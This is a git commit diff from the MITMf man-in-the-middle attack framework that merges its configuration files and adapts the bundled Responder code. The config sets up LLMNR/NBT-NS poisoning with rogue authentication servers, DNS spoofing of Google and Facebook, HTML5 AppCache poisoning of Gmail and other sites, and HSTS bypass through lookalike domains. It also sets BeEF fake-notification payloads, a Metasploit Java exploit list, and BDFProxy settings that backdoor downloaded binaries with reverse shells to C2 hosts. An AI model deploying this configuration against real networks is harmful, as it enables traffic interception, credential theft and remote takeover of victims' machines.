- All config files now consolidated into a single file

- Added 'args' option in config file - HSTS bypass is now a plugin (SSLstrip+) - SMBAuth now defaults to specified interface IP if --host is not passed - Modified plugins for new config support - Changed appoison and responder plugin for ConfigObj library support - Minor visual argparse changes - Slapped santa on the head with a trout - Gave rudolf a new nose
2025-07-14 00:53:58 -07:00 · 2014-12-26 13:36:55 +01:00 · 2014-12-26 13:36:55 +01:00 · 846f85426c
commit 846f85426c
parent f359ee7cdd
24 changed files with 531 additions and 436 deletions
--- a/README.md
+++ b/README.md
@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p
 Availible plugins:
 - Responder - LLMNR, NBT-NS and MDNS poisoner
 - SSLstrip+ - Partially bypass HSTS
 - Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
 - BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
 - AppCachePoison - Perform app cache poison attacks 
--- a/config/app_cache_poison.cfg
+++ b/config/app_cache_poison.cfg
@ -1,53 +0,0 @@
 [DEFAULT]
 ; HTML5 AppCache poisioning attack
 ; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
 ; generic settings for tampering engine
 templates_path=config/app_cache_poison_templates
 ;enable_only_in_useragents=Chrome|Firefox
 ; when visiting first url matching following expression we will embed iframes with all tamper URLs
 ;(to poison the cache for all of them all at once)
 mass_poison_url_match=http://.*prezydent\.pl.*
 ; it's only useful to mass poison chrome because:
 ; - it supports iframe sandbox preventing framebusting
 ; - does not ask for confirmation
 mass_poison_useragent_match=Chrome|Safari
 [test]
 ; any //example.com URL redirects to iana and will display our spoofed content
 tamper_url=http://example.com/
 manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
 templates=test ; which templates to use for spoofing content?
 skip_in_mass_poison=1
 ; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
 [gmail]
 tamper_url=http://mail.google.com/mail/
 ; manifest has to be of last domain in redirect loop
 manifest_url=http://mail.google.com/robots.txt
 templates=default ; could be omitted
 [facebook]
 tamper_url=http://www.facebook.com/
 manifest_url=http://www.facebook.com/robots.txt
 templates=facebook ; use different template
 [twitter]
 tamper_url=http://twitter.com/
 ;tamper_url_match=^http://(www\.)?twitter\.com/$
 manifest_url=http://twitter.com/robots.txt
 [testing]
 tamper_url=http://www.html5rocks.com/en/
 manifest_url=http://www.html5rocks.com/robots.txt
 ; we can also modify non-HTML URLs to append malicious code to them
 ; but for them to be cached in HTML5 AppCache they need to be referred in
 ; manifest for a poisoned domain
 ; if not, they are "only" cached for 10 years :D
 [ga]
 raw_url=http://www.google-analytics.com/ga.js
 templates=script
 skip_in_mass_poison=1
 ;you can add other scripts in additional sections like jQuery etc.
--- a/config/beefautorun.cfg
+++ b/config/beefautorun.cfg
@ -1,32 +0,0 @@
 #Example config file for the BeefAutorun plugin
 mode = oneshot 
 #can be set to loop, or oneshot
 #in loop mode the plugin will run modules on all hooked browsers every 10 seconds
 #in oneshot mode the plugin will run modules only once per hooked browser
 [ALL]  #Runs specified modules on all hooked browsers
 'Man-In-The-Browser'= '{}'
 [targets]  #Runs specified modules based on OS and Browser type
 	[[Windows]]  #Target all Windows versions using Firefox and Internet Explorer
 		[[[FF]]]
 		'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
 		[[[IE]]]
 		'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
 	[[Windows 7]]  #Target only Windows 7 using Chrome
 		[[[C]]]
 		'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
 	[[Linux]] #Target Linux platforms using Chrome
 		[[[C]]]
 		'Redirect Browser (Rickroll)' = '{}'
--- a/config/dhcp.cfg
+++ b/config/dhcp.cfg
@ -1,4 +0,0 @@
 #Example config file for DHCP spoofing
 ip_pool = 192.168.2.10-50
 subnet = 255.255.255.0
 dns_server = 192.168.2.20 #optional
--- a/config/dns.cfg
+++ b/config/dns.cfg
@ -1,3 +0,0 @@
 #Example config file for DNS tampering
 www.facebook.com  = 192.168.10.1
 google.com = 192.168.10.1
--- a/config/filepwn.cfg
+++ b/config/filepwn.cfg
@ -1,122 +0,0 @@
 """
    BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
    Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
    Copyright (c) 2013-2014, Joshua Pitts
    All rights reserved.
    Redistribution and use in source and binary forms, with or without modification,
    are permitted provided that the following conditions are met:
        1. Redistributions of source code must retain the above copyright notice,
        this list of conditions and the following disclaimer.
        2. Redistributions in binary form must reproduce the above copyright notice,
        this list of conditions and the following disclaimer in the documentation
        and/or other materials provided with the distribution.
        3. Neither the name of the copyright holder nor the names of its contributors
        may be used to endorse or promote products derived from this software without
        specific prior written permission.
    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    POSSIBILITY OF SUCH DAMAGE.
    Tested on Kali-Linux.
 """
 [ZIP]
 # patchCount is the max number of files to patch in a zip file
 # After the max is reached it will bypass the rest of the files 
 # and send on it's way
 patchCount = 5
 # In Bytes
 maxSize = 40000000
 blacklist = .dll,  #don't do dlls in a zip file
 [TAR]
 # patchCount is the max number of files to patch in a tar file
 # After the max is reached it will bypass the rest of the files
 # and send on it's way
 patchCount = 5
 # In Bytes
 maxSize = 40000000
 blacklist = ,   # a comma is null do not leave blank
 [targets]
 	#MAKE SURE that your settings for host and port DO NOT
 	# overlap between different types of payloads
 	[[ALL]] # DEFAULT settings for all targets REQUIRED
 	LinuxType = ALL 	# choices: x86/x64/ALL/None
 	WindowsType = ALL 	# choices: x86/x64/ALL/None
 	FatPriority = x64   # choices: x86 or x64
 	FileSizeMax = 60000000  # ~60 MB (just under) No patching of files this large
 	CompressedFiles = True #True/False
 		[[[LinuxIntelx86]]]
 		SHELL = reverse_shell_tcp   # This is the BDF syntax
 		HOST = 192.168.1.168 		# The C2
 		PORT = 8888
 		SUPPLIED_SHELLCODE = None
 		MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
 		[[[LinuxIntelx64]]]
 		SHELL = reverse_shell_tcp
 		HOST = 192.168.1.16
 		PORT = 9999
 		SUPPLIED_SHELLCODE = None
 		MSFPAYLOAD = linux/x64/shell_reverse_tcp
 		[[[WindowsIntelx86]]]
 		PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
 		HOST = 192.168.1.16
 		PORT = 8443
 		SHELL = reverse_shell_tcp 
 		SUPPLIED_SHELLCODE = None
 		ZERO_CERT = False
 		PATCH_DLL = True
 		MSFPAYLOAD = windows/shell_reverse_tcp
 		[[[WindowsIntelx64]]]
 		PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
 		HOST = 192.168.1.16
 		PORT = 8088
 		SHELL = reverse_shell_tcp
 		SUPPLIED_SHELLCODE = Nonepatchpatchpatch
 		ZERO_CERT = True
 		PATCH_DLL = False
 		MSFPAYLOAD = windows/x64/shell_reverse_tcp
 		[[[MachoIntelx86]]]
 		SHELL = reverse_shell_tcp
 		HOST = 192.168.1.16
 		PORT = 4444
 		SUPPLIED_SHELLCODE = None
 		MSFPAYLOAD = linux/x64/shell_reverse_tcp
 		[[[MachoIntelx64]]]
 		SHELL = reverse_shell_tcp
 		HOST = 192.168.1.16
 		PORT = 5555
 		SUPPLIED_SHELLCODE = None
 		MSFPAYLOAD = linux/x64/shell_reverse_tcp
--- a/config/hsts_bypass.cfg
+++ b/config/hsts_bypass.cfg
@ -1,11 +0,0 @@
 #here you can configure your domains to bypass HSTS on
 #the format is real.domain.com = fake.domain.com
 #for google and gmail
 accounts.google.com = account.google.com
 mail.google.com = gmail.google.com
 accounts.google.se = cuentas.google.se
 #for facebook
 www.facebook.com = social.facebook.com
 facebook.com = social.facebook.com
--- a/config/javapwn.cfg
+++ b/config/javapwn.cfg
@ -1,27 +0,0 @@
 # All versions strings without a * are considered vulnerable if clients Java version is <= update version
 # When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
 [Multi] #Cross platform exploits, yay java! <3
 multi/browser/java_rhino                                     = 1.6.0.28, 1.7.0.28                             
 multi/browser/java_calendar_deserialize                      = 1.6.0.10, 1.5.0.16                          
 multi/browser/java_getsoundbank_bof                          = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26                          
 multi/browser/java_atomicreferencearray                      = 1.6.0.30, 1.5.0.33, 1.7.0.2                          
 multi/browser/java_jre17_exec                                = 1.7.0.6
 multi/browser/java_jre17_jaxws                               = 1.7.0.7
 multi/browser/java_jre17_jmxbean                             = 1.7.0.10
 multi/browser/java_jre17_jmxbean_2                           = 1.7.0.11
 multi/browser/java_jre17_reflection_types                    = 1.7.0.17
 multi/browser/java_verifier_field_access                     = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37	                    
 multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
 multi/browser/java_jre17_method_handle                       = 1.7.0.7
 multi/browser/java_jre17_driver_manager                      = 1.7.0.17
 multi/browser/java_jre17_provider_skeleton                   = 1.7.0.21
 multi/browser/java_storeimagearray                           = 1.7.0.21
 multi/browser/java_setdifficm_bof                            = *1.6.0.16, *1.6.0.11
 [Windows] #These are windows specific
 windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
 windows/browser/java_cmm             = 1.6.0.41, 1.7.0.15
 windows/browser/java_mixer_sequencer = 1.6.0.18
--- a/config/mitmf.cfg
+++ b/config/mitmf.cfg
@ -1,10 +1,355 @@
-[BeEF]
+#MITMf configuration
 [MITMf]
 	#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
 	args=''
 	#Required BeEF and Metasploit options
 	[[BeEF]]
 		beefip = 127.0.0.1
 		beefport = 3000
 		user = beef
 		pass = beef
-[Metasploit]
+	[[Metasploit]]
 		msfport = 8080    #Port to start webserver for exploits
 		rpcip = 127.0.0.1
 		rpcpass = abc123
 #-----------------------------------------------------------------------------------------------------------------------------------------#
 #Plugin configuration starts here
 [Spoof]
 	[[DHCP]]
 		ip_pool = 192.168.2.10-50
 		subnet = 255.255.255.0
 		dns_server = 192.168.2.20 #optional
 	[[DNS]]
 		www.facebook.com  = 192.168.10.1
 		google.com = 192.168.10.1
 [Responder]
 	#Set these values to On or Off, so you can control which rogue authentication server is turned on.
 	SQL = On
 	SMB = On
 	Kerberos = On
 	FTP = On
 	POP = On
 	##Listen on 25/TCP, 587/TCP
 	SMTP = On
 	IMAP = On 
 	HTTP = On
 	HTTPS = On
 	DNS = On
 	LDAP = On
 	#Set a custom challenge
 	Challenge = 1122334455667788
 	#Set this to change the default logging file 
 	SessionLog = Responder-Session.log
 	#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 	#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 	RespondTo =
 	#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
 	#RespondTo = WPAD,DEV,PROD,SQLINT
 	RespondToName = 
 	#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 	DontRespondTo = 
 	#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
 	DontRespondToName =
 	[[HTTP Server]]
 		#Set this to On if you want to always serve a specific file to the victim.
 		Serve-Always = Off
 		#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
 		Serve-Exe = Off
 		#Uncomment and specify a custom file to serve, the file must exist.
 		Filename = config/responder/Denied.html
 		#Specify a custom executable file to serve, the file must exist. 
 		ExecFilename = config/responder/FixInternet.exe
 		#Set your custom PAC script
 		WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
 	[[HTTPS Server]]
 		#Change to use your certs
 		cert = config/responder/certs/responder.crt
 		key = config/responder/certs/responder.key
 [BeEFAutorun]
 	#Example config for the BeefAutorun plugin
 	mode = oneshot 
 	#can be set to loop, or oneshot
 	#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
 	#in oneshot mode the plugin will run modules only once per hooked browser
 	[[ALL]]  #Runs specified modules on all hooked browsers
 		'Man-In-The-Browser'= '{}'
 	[[targets]]  #Runs specified modules based on OS and Browser type
 		[[[Windows]]]  #Target all Windows versions using Firefox and Internet Explorer
 			[[[[FF]]]]
 				'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
 			[[[[IE]]]]
 				'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
 		[[[Windows 7]]]  #Target only Windows 7 using Chrome
 			[[[[C]]]]
 				'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
 		[[[Linux]]] #Target Linux platforms using Chrome
 			[[[[C]]]]
 				'Redirect Browser (Rickroll)' = '{}'
 [AppCachePoison]
 	# HTML5 AppCache poisioning attack
 	# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
 	# generic settings for tampering engine
 	#enable_only_in_useragents=Chrome|Firefox
 	templates_path=config/app_cache_poison_templates
 	# when visiting first url matching following expression we will embed iframes with all tamper URLs
 	#(to poison the cache for all of them all at once)
 	mass_poison_url_match=http://.*prezydent\.pl.*
 	# it's only useful to mass poison chrome because:
 	# - it supports iframe sandbox preventing framebusting
 	# - does not ask for confirmation
 	mass_poison_useragent_match=Chrome|Safari
 	[[test]]
 		# any //example.com URL redirects to iana and will display our spoofed content
 		tamper_url=http://example.com/
 		manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
 		templates=test # which templates to use for spoofing content?
 		skip_in_mass_poison=1
 	[[gmail]]
 		#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
 		tamper_url=http://mail.google.com/mail/
 		# manifest has to be of last domain in redirect loop
 		manifest_url=http://mail.google.com/robots.txt
 		templates=default # could be omitted
 	[[facebook]]
 		tamper_url=http://www.facebook.com/
 		manifest_url=http://www.facebook.com/robots.txt
 		templates=facebook # use different template
 	[[twitter]]
 		tamper_url=http://twitter.com/
 		#tamper_url_match=^http://(www\.)?twitter\.com/$
 		manifest_url=http://twitter.com/robots.txt
 	[[testing]]
 		tamper_url=http://www.html5rocks.com/en/
 		manifest_url=http://www.html5rocks.com/robots.txt
 	[[ga]]
 		# we can also modify non-HTML URLs to append malicious code to them
 		# but for them to be cached in HTML5 AppCache they need to be referred in
 		# manifest for a poisoned domain
 		# if not, they are "only" cached for 10 years :D
 		raw_url=http://www.google-analytics.com/ga.js
 		templates=script
 		skip_in_mass_poison=1
 		#you can add other scripts in additional sections like jQuery etc.
 [JavaPwn]
 	# All versions strings without a * are considered vulnerable if clients Java version is <= update version
 	# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
 	[[Multi]] #Cross platform exploits, yay java! <3
 		multi/browser/java_rhino                                     = 1.6.0.28, 1.7.0.28                             
 		multi/browser/java_calendar_deserialize                      = 1.6.0.10, 1.5.0.16                          
 		multi/browser/java_getsoundbank_bof                          = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26                          
 		multi/browser/java_atomicreferencearray                      = 1.6.0.30, 1.5.0.33, 1.7.0.2                          
 		multi/browser/java_jre17_exec                                = 1.7.0.6
 		multi/browser/java_jre17_jaxws                               = 1.7.0.7
 		multi/browser/java_jre17_jmxbean                             = 1.7.0.10
 		multi/browser/java_jre17_jmxbean_2                           = 1.7.0.11
 		multi/browser/java_jre17_reflection_types                    = 1.7.0.17
 		multi/browser/java_verifier_field_access                     = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37	                    
 		multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
 		multi/browser/java_jre17_method_handle                       = 1.7.0.7
 		multi/browser/java_jre17_driver_manager                      = 1.7.0.17
 		multi/browser/java_jre17_provider_skeleton                   = 1.7.0.21
 		multi/browser/java_storeimagearray                           = 1.7.0.21
 		multi/browser/java_setdifficm_bof                            = *1.6.0.16, *1.6.0.11
 	[[Windows]] #These are windows specific
 		windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
 		windows/browser/java_cmm             = 1.6.0.41, 1.7.0.15
 		windows/browser/java_mixer_sequencer = 1.6.0.18
 [SSLstrip+]
 	#here you can configure your domains to bypass HSTS on
 	#the format is real.domain.com = fake.domain.com
 	#for google and gmail
 	accounts.google.com = account.google.com
 	mail.google.com = gmail.google.com
 	accounts.google.se = cuentas.google.se
 	#for facebook
 	www.facebook.com = social.facebook.com
 	facebook.com = social.facebook.com
 #-----------------------------------------------------------------------------------------------------------------------------------------#
 #    BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
 #
 #    Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
 #
 #    Copyright (c) 2013-2014, Joshua Pitts
 #    All rights reserved.
 #
 #    Redistribution and use in source and binary forms, with or without modification,
 #    are permitted provided that the following conditions are met:
 #
 #        1. Redistributions of source code must retain the above copyright notice,
 #        this list of conditions and the following disclaimer.
 #
 #        2. Redistributions in binary form must reproduce the above copyright notice,
 #        this list of conditions and the following disclaimer in the documentation
 #        and/or other materials provided with the distribution.
 #
 #        3. Neither the name of the copyright holder nor the names of its contributors
 #        may be used to endorse or promote products derived from this software without
 #        specific prior written permission.
 #
 #    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 #    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 #    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 #    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
 #    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
 #    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 #    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
 #    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
 #    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 #    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 #    POSSIBILITY OF SUCH DAMAGE.
 #
 #    Tested on Kali-Linux.
 #-----------------------------------------------------------------------------------------------------------------------------------------#
 [FilePwn]
 	[[ZIP]]
 	# patchCount is the max number of files to patch in a zip file
 	# After the max is reached it will bypass the rest of the files 
 	# and send on it's way
 	patchCount = 5
 	# In Bytes
 	maxSize = 40000000
 	blacklist = .dll,  #don't do dlls in a zip file
 	[[TAR]]
 	# patchCount is the max number of files to patch in a tar file
 	# After the max is reached it will bypass the rest of the files
 	# and send on it's way
 	patchCount = 5
 	# In Bytes
 	maxSize = 40000000
 	blacklist = ,   # a comma is null do not leave blank
 	[[targets]]
 		#MAKE SURE that your settings for host and port DO NOT
 		# overlap between different types of payloads
 		[[[ALL]]] # DEFAULT settings for all targets REQUIRED
 		LinuxType = ALL 	# choices: x86/x64/ALL/None
 		WindowsType = ALL 	# choices: x86/x64/ALL/None
 		FatPriority = x64   # choices: x86 or x64
 		FileSizeMax = 60000000  # ~60 MB (just under) No patching of files this large
 		CompressedFiles = True #True/False
 			[[[[LinuxIntelx86]]]]
 			SHELL = reverse_shell_tcp   # This is the BDF syntax
 			HOST = 192.168.1.168 		# The C2
 			PORT = 8888
 			SUPPLIED_SHELLCODE = None
 			MSFPAYLOAD = linux/x86/shell_reverse_tcp	# MSF syntax
 			[[[[LinuxIntelx64]]]]
 			SHELL = reverse_shell_tcp
 			HOST = 192.168.1.16
 			PORT = 9999
 			SUPPLIED_SHELLCODE = None
 			MSFPAYLOAD = linux/x64/shell_reverse_tcp
 			[[[[WindowsIntelx86]]]]
 			PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
 			HOST = 192.168.1.16
 			PORT = 8443
 			SHELL = reverse_shell_tcp 
 			SUPPLIED_SHELLCODE = None
 			ZERO_CERT = False
 			PATCH_DLL = True
 			MSFPAYLOAD = windows/shell_reverse_tcp
 			[[[[WindowsIntelx64]]]]
 			PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
 			HOST = 192.168.1.16
 			PORT = 8088
 			SHELL = reverse_shell_tcp
 			SUPPLIED_SHELLCODE = Nonepatchpatchpatch
 			ZERO_CERT = True
 			PATCH_DLL = False
 			MSFPAYLOAD = windows/x64/shell_reverse_tcp
 			[[[[MachoIntelx86]]]]
 			SHELL = reverse_shell_tcp
 			HOST = 192.168.1.16
 			PORT = 4444
 			SUPPLIED_SHELLCODE = None
 			MSFPAYLOAD = linux/x64/shell_reverse_tcp
 			[[[[MachoIntelx64]]]]
 			SHELL = reverse_shell_tcp
 			HOST = 192.168.1.16
 			PORT = 5555
 			SUPPLIED_SHELLCODE = None
 			MSFPAYLOAD = linux/x64/shell_reverse_tcp
--- a/config/replace.cfg
+++ b/config/replace.cfg
--- a/config/responder/responder.conf
+++ b/config/responder/responder.conf
@ -1,59 +0,0 @@
 [Responder Core]
 ;;
 ;Set these values to On or Off, so you can control which rogue authentication server is turned on.
 SQL = On
 SMB = On
 Kerberos = On
 FTP = On
 POP = On
 ;;Listen on 25/TCP, 587/TCP
 SMTP = On
 IMAP = On 
 HTTP = On
 HTTPS = On
 DNS = On
 LDAP = On
 ;
 ;Set a custom challenge
 Challenge = 1122334455667788
 ;
 ;Set this to change the default logging file 
 SessionLog = Responder-Session.log
 ;
 ;Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 ;RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 RespondTo =
 ;Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
 ;RespondTo = WPAD,DEV,PROD,SQLINT
 RespondToName = 
 ;
 ;DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
 DontRespondTo = 
 ;Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
 DontRespondToName =
 ;
 [HTTP Server]
 ;;
 ;Set this to On if you want to always serve a specific file to the victim.
 Serve-Always = Off
 ;
 ;Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
 Serve-Exe = Off
 ;
 ;Uncomment and specify a custom file to serve, the file must exist.
 Filename = config/responder/Denied.html
 ;
 ;Specify a custom executable file to serve, the file must exist. 
 ExecFilename = config/responder/FixInternet.exe
 ;
 ;Set your custom PAC script
 WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
 ;
 [HTTPS Server]
 ;
 ;Change to use your certs
 cert = config/responder/certs/responder.crt
 key = config/responder/certs/responder.key
 ;
--- a/libs/responder/Responder.py
+++ b/libs/responder/Responder.py
@ -16,7 +16,7 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
+import sys,struct,SocketServer,re,socket,thread,Fingerprint,random,os,BaseHTTPServer, select,urlparse,zlib, string, time
 from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
 from Fingerprint import RunSmbFinger,OsNameClientVersion
 from odict import OrderedDict
@ -24,45 +24,6 @@ from socket import inet_aton
 from random import randrange
 from libs.sslstrip.DnsCache import DnsCache
 VERSION = '2.1.2'
 #Config parsing
 config = ConfigParser.ConfigParser()
 config.read("./config/responder/responder.conf")
 # Set some vars.
 On_Off = config.get('Responder Core', 'HTTP').upper()
 SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
 SMB_On_Off = config.get('Responder Core', 'SMB').upper()
 SQL_On_Off = config.get('Responder Core', 'SQL').upper()
 FTP_On_Off = config.get('Responder Core', 'FTP').upper()
 POP_On_Off = config.get('Responder Core', 'POP').upper()
 IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
 SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
 LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
 DNS_On_Off = config.get('Responder Core', 'DNS').upper()
 Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
 NumChal = config.get('Responder Core', 'Challenge')
 SessionLog = config.get('Responder Core', 'SessionLog')
 Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
 Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
 FILENAME = config.get('HTTP Server', 'Filename')
 WPAD_Script = config.get('HTTP Server', 'WPADScript')
 #HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
 RespondTo = config.get('Responder Core', 'RespondTo').strip()
 RespondTo.split(",")
 RespondToName = config.get('Responder Core', 'RespondToName').strip()
 RespondToName.split(",")
 DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
 DontRespondTo.split(",")
 DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
 DontRespondToName.split(",")
 HTMLToServe = ''
 if len(NumChal) is not 16:
    sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
 def IsOsX():
    Os_version = sys.platform
    if Os_version == "darwin":
@ -151,11 +112,6 @@ def PrintLLMNRNBTNS(outfile,Message):
        return True
 # Break out challenge for the hexidecimally challenged.  Also, avoid 2 different challenges by accident.
 Challenge = ""
 for i in range(0,len(NumChal),2):
    Challenge += NumChal[i:i+2].decode("hex")
 #Packet class handling all packet generation (see odict.py).
 class Packet():
    fields = OrderedDict([
@ -2021,8 +1977,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
    def __init__(self, server_address, RequestHandlerClass):
        BaseServer.__init__(self, server_address, RequestHandlerClass)
        ctx = SSL.Context(SSL.SSLv3_METHOD)
-        cert = config.get('HTTPS Server', 'cert')
+        cert = SSLcert
-        key =  config.get('HTTPS Server', 'key')
+        key =  SSLkey
        ctx.use_privatekey_file(key)
        ctx.use_certificate_file(cert)
        self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -2483,7 +2439,51 @@ def serve_thread_SSL(host, port, handler):
    except Exception, e:
        print "[-] Error starting TCP server on port " + str(port) + ": " + str(e) 
-def start_responder(options, ip_address):
+def start_responder(options, ip_address, config):
    global VERSION; VERSION = '2.1.2'
    # Set some vars.
    global On_Off; On_Off = config['HTTP'].upper()
    global SSL_On_Off; SSL_On_Off = config['HTTPS'].upper()
    global SMB_On_Off; SMB_On_Off = config['SMB'].upper()
    global SQL_On_Off; SQL_On_Off = config['SQL'].upper()
    global FTP_On_Off; FTP_On_Off = config['FTP'].upper()
    global POP_On_Off; POP_On_Off = config['POP'].upper()
    global IMAP_On_Off; IMAP_On_Off = config['IMAP'].upper()
    global SMTP_On_Off; SMTP_On_Off = config['SMTP'].upper()
    global LDAP_On_Off; LDAP_On_Off = config['LDAP'].upper()
    global DNS_On_Off; DNS_On_Off = config['DNS'].upper()
    global Krb_On_Off; Krb_On_Off = config['Kerberos'].upper()
    global NumChal; NumChal = config['Challenge']
    global SessionLog; SessionLog = config['SessionLog']
    global Exe_On_Off; Exe_On_Off = config['HTTP Server']['Serve-Exe'].upper()
    global Exec_Mode_On_Off; Exec_Mode_On_Off = config['HTTP Server']['Serve-Always'].upper()
    global FILENAME; FILENAME = config['HTTP Server']['Filename']
    global WPAD_Script; WPAD_Script = config['HTTP Server']['WPADScript']
    #HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
    global SSLcert; SSLcert = config['HTTPS Server']['cert']
    global SSLkey; SSLkey = config['HTTPS Server']['key']
    global RespondTo; RespondTo = config['RespondTo'].strip()
    RespondTo.split(",")
